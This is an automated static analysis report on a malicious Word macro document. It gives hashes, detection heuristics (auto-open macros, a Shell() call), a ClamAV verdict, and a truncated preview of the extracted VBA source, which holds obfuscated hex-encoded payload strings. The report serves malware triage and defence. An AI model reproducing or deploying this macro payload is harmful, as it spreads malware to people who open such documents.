Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edbe21728c2d6c78…

MALICIOUS

Office (OLE)

98.0 KB Created: 2018-03-23 00:22:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: fed8d0198de617f9a0aa627a913c939f SHA-1: c0bc54c68961dcc3148acc5282e359b692ca1708 SHA-256: edbe21728c2d6c7844c5a16261cdf10ce1bf16f18bc0b592a52ca5681febf2a2
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open and Workbook_Open auto-execution macro, which are designed to execute arbitrary code. The critical OLE_VBA_SHELL heuristic indicates a Shell() call within the VBA code, likely used to download and execute a second-stage payload. The presence of a 'macros.bas' file further supports this. The ClamAV detection 'Xls.Malware.Cwsp-6735643-0' also confirms its malicious nature.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19907 bytes
SHA-256: 6d7c1d47dea8432fd3eb669e51c2f08d679b0102df230ebb567535acc63083c6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 73 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Public Sub KM_Q()
   Dim KY_AQ As String
   Dim TJ_RJ As String
   Dim W_B As String
W_B = "A77D70527D7D699D8A6C86587D7D7D7DB6A77D7D977D7D7D7D62477D597D7D7D663F7D547D857D955D7D7D607D687DAA567DAA5E4EADA37B7D7D5F7D7D507DAE7D7DA27D7DA07D7A7D3FA257627DA57D7D84417D7B7D7D7DB97D63927D4B6F7F7B7D7D8D7D7D7D6EA54C4989577D9E807D914C7D715E43"
Dim J_A As String
J_A = "7D507B7D5154A281957D7D57B77D8B7D4A9A7D8E7D7DA47DA97D7D4B5B7D567B8E7D7D57407DA1745B7D67947D7D7D657D657D7D7D677D727D7D97887D7D3E7AA5BC467D97507D7D8F7D7D7D6B7D7A7D7D977D57B97D7D7B7D5F7D98569F7D7D675771817D72A853447DA07D47B97D465A8A7D67797D7D"
Dim IIN_RXX As String
IIN_RXX = "7D7D7D4B765D7D7D7D457D7D517D7DA37D7D517D775B72A7AB7D7B7DB1AE7D8096A5A87D646F7DA47DB07D8E7DA8617D79787D7D587D7D7D7D7D72A046BB7D488A7D737D7D7D7D7D7D7D7D7DBB7D587D75737DAC7B7D727DA57D427D7D7D837D7D737D8B7DBB5F65B27D5B7D657D7D8562849F4C7DBC9E"
Dim E_YHD As String
E_YHD = "7DA248937D7D7D7D7D7D887D7D7D7D7D857D477D7D98A84A7D7D7D757DA47D7D668DBD7D7DA8538751A77D7D7D7D727D7D948A7D7D7D7D7D6168A5587DB37D7D7D424E65A94E957D7D837D7D406A7DBCA7437D7B7D7D7D7D7D7D6D7D7D7D7D7D597D7D8462B57D7D607D718AA27D7D7DA47D7D903E725A"
Dim HL_GF As String
HL_GF = "777D7D9246A3527D969C3E75837D957DA57D8E7D7D877E7D7D7D757D7D7D7D4B7A7D7D7DB27D6F5D7D4A7D7D7D5E577D7D7D7D7D7DB17D437DBB6B627D7D7DAA68477D7D7D5C7DA77B7D7D79A85B975E4D467DB48584597D7DA8417D7D9A7DA17D55837D7D7D507D747D53B4504E7D7D7D7D7D7D7DBD52"
Dim LC_VZW As String
LC_VZW = "6F8F587D7D7D7D907D9C91A77158A17D4E697D88957D6D7D7D4B7D7D947DB97DB17D7D7D7D93467D7D76AA7D737D7D8E43BB919F7D7D659860627D7D7D7D5D7D7D7D7D7D477D6167B77D7D7D6E7D7D727D8F7866947D7DA96C7D6E6C7D4B7D567D7D7D7D41B37D7D6D75AB9FA97D7D927D6F7D7D83A764"
Dim TP_W As String
TP_W = "587DB77D7DACAA7D7784857D6E5A93B67D5C5D663E7D7D7D7D607D56727D7D7D7D76787D3E7D7D9C7D937DA65394AA7D65877D58537D7D588A7D7DABA77DAE7D86917D7D7D935D7D74767D7B717D7D7D7D4CBA7D7D7D7D805EB9AD7D997D467D5D7D7D6A3F7D68A07D7D7D7D7D7D7D98637D85B87D687D"
Dim T_R As String
T_R = "7D7D7D7D827D967D7D427C7D4A7DA08F7D7D7D787D7D7D7D3FA17D60966EA27DB87D477D7D9D9C7D98488CB87D7D7D7DA9AFA17D487D637D4595627D7D7DA87D7D7D7D7D7D697D7D7D597D89A67DAC53987D3E45AE7D7D7D7D4577427D7D7D93797D7D7D847D3E6A7DB89D7D7D7D7D7D7D7DB5547D907D"
Dim B_M As String
B_M = "617D7D7D83487D7D7D70A37D82B6B744827DA67D946E7D63997D7D7D5960637D737D607D526E7DAE7D7D7DB77D7D716D7D71887D7DB37D5C8DA6547D7D7D4B7D7DA5937D7D51777D7D957D3E7D7D677D7DB47D7D5BAFA56D7D8C7D68984DB66BB37D558A7D7D5E4F7D7D5B7D5C577D7C927D4D7D707D69"
Dim GIM_PN As String
GIM_PN = "7D647D7D4D7D7D7D4F7D7D7D7D717D7D7D7D87B87D737D7D4372A796806D7D8B7D7D4D7D407D677D7D7D70A59EAF7D8944A7517D7D7D65AC7D617D7DB37D857D7D7D6BA57D6E7D97487D51406F7D7D7D5B8F7D5A817D487D7D7D7DA27D7D7D89B97D7D827E7D7D7D8C7D7D51A97D7D434295A6AC7D9E7D"
Dim G_Q As String
G_Q = "607D51BA7D5E7D7E7D7DAC7D8D897DBA737D7D7D747D727D859C7DB07D7D7DA07D5FBB7D977DAB7DA87D8A7D867D7D7D7D774BA9497D707DBC7D7D6C7DAC7D4A7D6B7D4160B75DA77D8F828E7DA77D7D7D7D7D7D7D73887D7D5A7D9B7DB39F7C7A7D7D7D7D7D7D407D7D7D7D7357936A7D847D53537D7D"
Dim DWK_GL As String
DWK_GL = "9C869AB1497D7D7D4FB5AC5E7D7D7D7D7D7D807D99544D7D46AD7D59AA657DA5AD7DA0B77D7D7D4ABB907D7DA4964DA07D5E7D9A658676B47D40B57E858E7D7D7DA2887DAA7D7D7D8D7D7D5D7D7D547D7D7D4450717E64867D7D6ABB837D3F7CA77D7D7D7DBD6072BD7DB894869F9E7D4C6188B39A847C"
Dim AUN_M As String
AUN_M = "3F7D7D48B09D487D7D7D6D7D607D7D3F7D7DA5B57D8D7D7D7D747D7D7D4A7D7D7D8A7D557D5E7D7DB4577D7C7D755FA47D7D7D7D727D7DB67D7D7D4743556164AA417D957D5A7D7D7D4C5E747D7D7D7D8E70A17D7D8C627D587D7D7D9D7DB77D7D7DB854827E637D8D7D587D7DB37D7DA8BBB179706B3F"
Dim XXN_YBJ As String
XXN_YBJ = "477D7D927D7EB67D7D917D7D8BB57DA7AE7D563E7D64AE43B8744D92B4AE7DAAB64A7D7D7D5B4D4C9D9E7D7D6AB07D7D487D9B533F7AB66D8D8448A6A4B67D71877D7E7D4D7D917D477D3E7D7D448B7D5A7DAA7D7795B57
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.